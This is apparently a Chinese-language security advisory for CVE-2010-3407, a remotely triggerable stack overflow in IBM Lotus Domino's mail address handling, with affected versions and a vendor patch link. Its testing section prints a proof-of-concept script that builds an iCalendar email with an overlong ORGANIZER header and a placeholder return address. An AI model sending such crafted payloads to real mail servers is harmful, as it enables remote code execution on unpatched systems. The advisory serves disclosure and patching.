发布日期：2010-09-14
更新日期：2010-09-16

受影响系统：

IBM Lotus Domino 8.5
IBM Lotus Domino 8.0

不受影响系统：

IBM Lotus Domino 8.5.2
IBM Lotus Domino 8.5.1 Fix Pack 2
IBM Lotus Domino 8.0.2 Fix Pack 5

描述：

---

BUGTRAQ  ID: 43219
CVE(CAN) ID: CVE-2010-3407

Lotus Domino是集电子邮件、文档数据库、快速应用开发技术以及Web技术为一体的电子邮件与群集平台。

Lotus Notes的nnotes.dll库中的MailCheck821Address()函数在使用Cstrcpy()函数拷贝邮件地址时存在栈溢出漏洞，远程攻击者在邮件中包含超长的ORGANIZER:mailto iCalendar头就可以触发这个溢出，导致执行任意代码。

<*来源：A. Plaskett
  
  链接：http://secunia.com/advisories/41433/
        http://marc.info/?l=full-disclosure&m=128449383412662&w=2
        http://labs.mwrinfosecurity.com/files/Advisories/mwri_lotus-domino-ical-stack-overflow_2010-09-14.pdf
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

ret_address = “BBBB”
overflow = ("A" * 2374) + ret_address + ("C" * 6632)
organiser = "ORGANIZER:mailto:H@%s.com" % overflow
body = "Content-Type: text/calendar; method=COUNTER; charset="UTF-8"
Subject: sent_mail2.txt
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
BEGIN:VCALENDAR
METHOD:COUNTER
PRODID:-//HGOPO@VDGCOHBCOGHRO@GQHOOPGHHCCCGCBGGCLGMCPN//
VERSION:2.0
BEGIN:VEVENT
UID:KORBOOGGGOHGNIH
SEQ:2
RRULE:aaaa
%s
ATTENDEE;:Mailto:aaaa@localdomain
SUMMARY:PGOMG@OMPGR@KOFMEOPNCMH
DTSTART:20091130T093000Z
DTEND:20091130T093000Z
DTSTAMP:20091130T083147Z
LOCATION:Location
STATUS:aaaa
END:VEVENT
END:VCALENDAR
“”” % organiser

建议：

---

厂商补丁：

IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www-01.ibm.com/support/docview.wss?uid=swg21446515

浏览次数：5520
严重程度：0（网友投票）